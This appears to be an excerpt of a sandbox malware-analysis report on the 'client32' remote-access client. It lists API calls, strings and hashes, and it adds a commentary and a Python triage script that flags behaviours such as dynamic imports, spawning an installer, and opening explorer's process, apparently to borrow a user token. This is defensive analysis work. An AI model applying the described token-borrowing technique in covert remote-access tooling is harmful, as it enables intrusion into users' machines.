                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                    • Opcode ID: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                                                                                                    • Instruction ID: 9f027eddd4dddc581f186f25ec93b792fa700742cd5a4619bf017c7ec0e1ed24
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B31BBB59122349FE706DBE4C8D5A76B7E9E34C758F00857AE93083248D7F4A881CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR100(00000018,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687EA96F
                                                                                                                                                                                                    • _lock.MSVCR100(0000000A,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687EA981
                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687EA998
                                                                                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 6880749F
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 688074A6
                                                                                                                                                                                                    • _errno.MSVCR100(687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 688074B9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 957642387-0
                                                                                                                                                                                                    • Opcode ID: 1bd055b6083121d80e33dfa5568883a4714f5ea254687d52776bfff21dfc5970
                                                                                                                                                                                                    • Instruction ID: 8ad631f96db838aeb177ad825b44802f5310a92a20880550bf7bb3694a76c840
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bd055b6083121d80e33dfa5568883a4714f5ea254687d52776bfff21dfc5970
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D119175544206DEEB106FB88A8C63CB7B07FA2718FD1482AF2647B180CF784481CB71
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1103D3D1
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 1103D3DE
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 1103D0B0: Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1
                                                                                                                                                                                                      • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcess$ErrorLastMessageSleep_memmove_memset_strrchrwsprintf
                                                                                                                                                                                                    • String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$h+r$redirect:
                                                                                                                                                                                                    • API String ID: 118650250-2379608955
                                                                                                                                                                                                    • Opcode ID: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
                                                                                                                                                                                                    • Instruction ID: 8883845aa1adcb6b462271895c3eb4188d935db878da715d2f936e5278910226
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B1D234E0195A9FDB06DF98CC90FEDB3B5AF89309F448154E82567380EB34A908CBD1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,24DE4E77,?,?,?), ref: 1106D0E2
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ..\ctl32\Connect.cpp, xrefs: 1106D2AA
                                                                                                                                                                                                    • Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106D0C5
                                                                                                                                                                                                    • erased=%d, idata->dead=%d, xrefs: 1106D293
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalEnterEventSection
• String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
• API String ID: 2291802058-2272698802
APIs
• InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5C4
• InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5F4
• InflateRect.USER32(?,000000FF,000000FF), ref: 1101D618
• GetBkColor.GDI32(?), ref: 1101D61E
• GetTextColor.GDI32(?), ref: 1101D6A5
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InflateRect$Color$Text
• String ID: VUUU$VUUU
• API String ID: 1214208285-3149182767
APIs
  • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• InitializeCriticalSection.KERNEL32(0000002C,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B3615
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B361F
• GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B363A
• std::exception::exception.LIBCMT ref: 110B3689
• __CxxThrowException@8.LIBCMT ref: 110B369E
• std::_Xinvalid_argument.LIBCPMT ref: 110B36ED
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateEvent$CriticalException@8InitializeSectionThrowVersionXinvalid_argument_memsetstd::_std::exception::exceptionwsprintf
• String ID: vector<T> too long
• API String ID: 3908453871-3788999226
APIs
• EnterCriticalSection.KERNEL32(?,24DE4E77,?,?,?), ref: 11065470
• SetEvent.KERNEL32 ref: 1106549A
• timeGetTime.WINMM ref: 110654D3
• InterlockedDecrement.KERNEL32(?), ref: 110654F0
• _free.LIBCMT ref: 11065578
• LeaveCriticalSection.KERNEL32(?), ref: 11065581
Strings
• Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms, xrefs: 1106554E
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$DecrementEnterEventInterlockedLeaveTime_freetime
• String ID: Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms
• API String ID: 1154861362-2729525473
APIs
• LoadLibraryA.KERNEL32(Kernel32.dll,24DE4E77,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
• GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031146
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
                                                                                                                                                                                                    • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                                                                                                                                    • API String ID: 1613046405-2825297712
                                                                                                                                                                                                    • Opcode ID: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                                                                                                    • Instruction ID: dbcb6794e105daa586ddc3bbf804ff67aea9c2c21b85bbe8f4e4c15c2f8116d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9621A2B1D21269AFCB01DF99D884A9EFFB8FB49B15F10852BF521E3244D7B419018FA1
APIs
  • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
  • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
  • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
• wsprintfA.USER32 ref: 1102741E
  • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
  • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
  • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
• wsprintfA.USER32 ref: 11027448
• ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102749B
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
• String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
• API String ID: 816263943-3387570681
• Opcode ID: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
• Instruction ID: 425802901d1907c5be7fd2b9c3bfd6c49e25210cb6f83e26e9bc69af70aaa39f
• Opcode Fuzzy Hash: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
• Instruction Fuzzy Hash: B411C875E0131EABDB11EBB5CC45FAAF7A89B04708F5041F5E91597181EB31B9048B91
APIs
• FindWindowA.USER32(?,00000000), ref: 1108B274
• GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108B293
• OpenProcess.KERNEL32(00000440,00000000,04000000,110EAA59,?,04000000,00000000,?,00000000,00000000,?,00000000,110EA93D,?,110EAA59,0000070B), ref: 1108B2A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ProcessWindow$FindOpenThread
• String ID: Error. NULL hToken$Progman
• API String ID: 3432422346-976623215
• Opcode ID: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
• Instruction ID: 4ee04209679d4ac62f627f7e7d6e091cb71ded9887b28b928329626620bf84cb
• Opcode Fuzzy Hash: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
• Instruction Fuzzy Hash: 25119675E0122D9BD751DFA4D885BEEF7B8EF4C218F1081A9EE16E7240DB31A900C7A5
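The three client32 function entries above are more useful when read as behaviours than as raw call lists: the first resolves ProcessIdToSessionId at run time through LoadLibraryA/GetProcAddress instead of importing it; the second builds a path with wsprintfA from "%sWINST32.EXE" / "%sWINSTALL.EXE" (the subcall resolves CSIDL 0x26 and 0x1A, i.e. Program Files and AppData) and launches it through ShellExecuteA with the "/EM" switch; the third finds the desktop window "Progman", takes its owning process ID and calls OpenProcess with access mask 0x440, which decodes to PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE. Read together with the "Error. NULL hToken" string, that last sequence is consistent with borrowing the interactive user's token from explorer.exe, though the listing alone does not prove it. The following Python is an added example, not Joe Sandbox's code and not the NetSupport client's: it parses entries in the report format above, groups calls per function, decodes the OpenProcess mask and the CSIDL values, and flags the three combinations. The pattern labels are this example's own; SAMPLE is constructed from the entries above with the memory-dump lists left out.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example; not
Joe Sandbox's code and not the NetSupport client's). It parses the "APIs",
"String ID" and "Snapshot File" lines in the format above, groups them per
function, decodes a few numeric arguments and flags API/string combinations.
Pattern labels are this example's own; SAMPLE is built from the entries above."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function\s+(?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?\s*,?\s*"
    r"(?:ref:\s*(?P<ref>[0-9A-F]+))?\s*$")
PROCESS_RIGHTS = {  # winnt.h PROCESS_* access bits
    0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
    0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE",
    0x80: "PROCESS_CREATE_PROCESS", 0x400: "PROCESS_QUERY_INFORMATION",
    0x800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
CSIDL = {0x1A: "CSIDL_APPDATA", 0x26: "CSIDL_PROGRAM_FILES"}  # shlobj.h
# (label, direct APIs that must all appear, substrings that must occur in String ID)
PATTERNS = [
    ("dynamic import resolution", {"LoadLibraryA", "GetProcAddress"}, ()),
    ("installer spawned via ShellExecute", {"wsprintfA", "ShellExecuteA"}, ("WINST32.EXE", "/EM")),
    ("explorer.exe located via Progman window",
     {"FindWindowA", "GetWindowThreadProcessId", "OpenProcess"}, ("Progman",)),
]

@dataclass
class FunctionEntry:
    module: str = "?"
    calls: list = field(default_factory=list)    # (api, [args], ref, via_subcall)
    strings: list = field(default_factory=list)

    def apis(self) -> set:
        """APIs the function calls directly; 'Part of subcall' lines are excluded."""
        return {api for api, _, _, sub in self.calls if not sub}

def parse_report(text: str) -> list:
    """One FunctionEntry per 'APIs' header; call lines end at the 'Strings' header."""
    entries, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur, in_apis = FunctionEntry(), True
            entries.append(cur)
        elif cur is None:
            continue
        elif line == "Strings":
            in_apis = False
        elif line.startswith("• String ID:"):
            cur.strings = line.split(":", 1)[1].strip().split("$")
        elif line.startswith("• Snapshot File:"):
            cur.module = line.rsplit("_", 1)[-1].split(".")[0]   # e.g. client32
        elif in_apis and (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append((m["api"], args, m["ref"], bool(m["sub"])))
    return entries

def decode_bits(mask: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if mask & bit]

def open_process_rights(entry: FunctionEntry) -> list:
    """Decoded dwDesiredAccess of the first OpenProcess call, [] if there is none."""
    for api, args, _, _ in entry.calls:
        if api == "OpenProcess" and args:
            return decode_bits(int(args[0], 16), PROCESS_RIGHTS)
    return []

def folder_ids(entry: FunctionEntry) -> list:
    """CSIDL names passed to SHGetFolderPathA (subcalls included), in call order."""
    return [CSIDL.get(int(a[1], 16), a[1]) for api, a, _, _ in entry.calls
            if api == "SHGetFolderPathA" and len(a) > 1]

def match_patterns(entry: FunctionEntry) -> list:
    return [label for label, apis, needles in PATTERNS if apis <= entry.apis()
            and all(any(n in s for s in entry.strings) for n in needles)]

SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(Kernel32.dll,24DE4E77,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
• GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
Strings
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
• String ID: Kernel32.dll$ProcessIdToSessionId
APIs
  • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
  • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
  • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
• wsprintfA.USER32 ref: 1102741E
• ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102749B
Strings
• String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
APIs
• FindWindowA.USER32(?,00000000), ref: 1108B274
• GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108B293
• OpenProcess.KERNEL32(00000440,00000000,04000000,110EAA59,?,04000000,00000000,?,00000000,00000000,?,00000000,110EA93D,?,110EAA59,0000070B), ref: 1108B2A9
Strings
• String ID: Error. NULL hToken$Progman
"""
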